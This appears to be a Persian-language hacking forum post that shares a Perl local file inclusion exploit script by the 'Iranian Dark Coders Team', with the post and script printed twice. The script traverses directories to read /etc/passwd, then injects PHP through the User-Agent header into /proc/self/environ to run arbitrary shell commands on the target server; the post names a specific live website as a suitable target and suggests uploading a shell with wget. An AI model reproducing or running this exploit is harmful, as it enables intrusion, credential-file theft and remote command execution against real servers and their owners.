توییت
اسکریپت جالبیه
نحوه استفاده perl lfi-cmd.pl
بعد سایت میدی
http://www.site.
com/index.php?id=
تا شل اپلود کنه
با دستور [b]wget
این هم تارگت مناسب
http://www.tecnoandes.com/site/template_home.php4?sec=2&pag=1&url=../../../../../../../../etc/passwd
به زبان پرل
[php]#Iranian Dark Coders Team
#WwW.IDC-TeaM.NeT
#Coded BY M.R.S.CO
#We Are : M.R.S.CO , N3O , G3n3Rall , Nafsh , HijaX
#Friends : b3hz4d , IrIsT , Mr.Xpr , BlacK.King
#LFI ExplOiter
#ver : beta
#author : M.R.S.CO
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print q (
------------------------------
| Iranian Dark Coders Team |
------------------------------
| WwW.IDC-TeaM.NeT |
------------------------------
| Coded BY M.R.S.CO |
------------------------------
);
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
$ua->timeout(30);
print "\n\t Enter Target [Example:http://site.il/idc.php?id=]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
$tf=1;
print "\n\n\t\tprocessing ...\n";
$t=0;
while($tf==1)
{
$t=$t+1;
if ($t==25){print "Passwd Not Found!!"; exit();}
$dot=$dot . "../";
$source=get $Target . $dot . "etc/passwd";
$source2=get $Target .$dot . "etc/passwd%00";
if (($source =~ m/:root:/i || $source =~ m/:x:/i || $source =~ m/:0:/i))
{
$u="";
$tf=2;
}
if (($source2 =~ m/:root:/i || $source2 =~ m/:x:/i || $source2 =~ m/:0:/i))
{
$u="%00";
$tf=2;
}
}
$ua->agent('<?php echo "IDC"; ?>');
$response=$ua->get($Target . $dot . "proc/self/environ" . $u);
if ($response->decoded_content =~ "IDC")
{
while($cmd=="exit")
{
print "\n\nEnter Your Command : ";
$cmd=<STDIN>;
chomp($cmd);
$ua->agent('<?php echo "\n\n\nidc-team"; system("' . $cmd . '"); echo "mrsco\n\n\n"; ?>');
$response=$ua->get($Target . $dot . "proc/self/environ" . $u);
$between=substr($response->decoded_content, index($response->decoded_content, 'idc-team')+8, index($response->decoded_content, 'mrsco') - index($response->decoded_content, 'idc-team')-8);
print "\n". $between;
}}else{ print "\n\t\tDont Injectable";}[/php]
نحوه استفاده perl lfi-cmd.pl
بعد سایت میدی
http://www.site.
com/index.php?id=
تا شل اپلود کنه
با دستور [b]wget
این هم تارگت مناسب
http://www.tecnoandes.com/site/template_home.php4?sec=2&pag=1&url=../../../../../../../../etc/passwd
به زبان پرل
[php]#Iranian Dark Coders Team
#WwW.IDC-TeaM.NeT
#Coded BY M.R.S.CO
#We Are : M.R.S.CO , N3O , G3n3Rall , Nafsh , HijaX
#Friends : b3hz4d , IrIsT , Mr.Xpr , BlacK.King
#LFI ExplOiter
#ver : beta
#author : M.R.S.CO
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print q (
------------------------------
| Iranian Dark Coders Team |
------------------------------
| WwW.IDC-TeaM.NeT |
------------------------------
| Coded BY M.R.S.CO |
------------------------------
);
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
$ua->timeout(30);
print "\n\t Enter Target [Example:http://site.il/idc.php?id=]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
$tf=1;
print "\n\n\t\tprocessing ...\n";
$t=0;
while($tf==1)
{
$t=$t+1;
if ($t==25){print "Passwd Not Found!!"; exit();}
$dot=$dot . "../";
$source=get $Target . $dot . "etc/passwd";
$source2=get $Target .$dot . "etc/passwd%00";
if (($source =~ m/:root:/i || $source =~ m/:x:/i || $source =~ m/:0:/i))
{
$u="";
$tf=2;
}
if (($source2 =~ m/:root:/i || $source2 =~ m/:x:/i || $source2 =~ m/:0:/i))
{
$u="%00";
$tf=2;
}
}
$ua->agent('<?php echo "IDC"; ?>');
$response=$ua->get($Target . $dot . "proc/self/environ" . $u);
if ($response->decoded_content =~ "IDC")
{
while($cmd=="exit")
{
print "\n\nEnter Your Command : ";
$cmd=<STDIN>;
chomp($cmd);
$ua->agent('<?php echo "\n\n\nidc-team"; system("' . $cmd . '"); echo "mrsco\n\n\n"; ?>');
$response=$ua->get($Target . $dot . "proc/self/environ" . $u);
$between=substr($response->decoded_content, index($response->decoded_content, 'idc-team')+8, index($response->decoded_content, 'mrsco') - index($response->decoded_content, 'idc-team')-8);
print "\n". $between;
}}else{ print "\n\t\tDont Injectable";}[/php]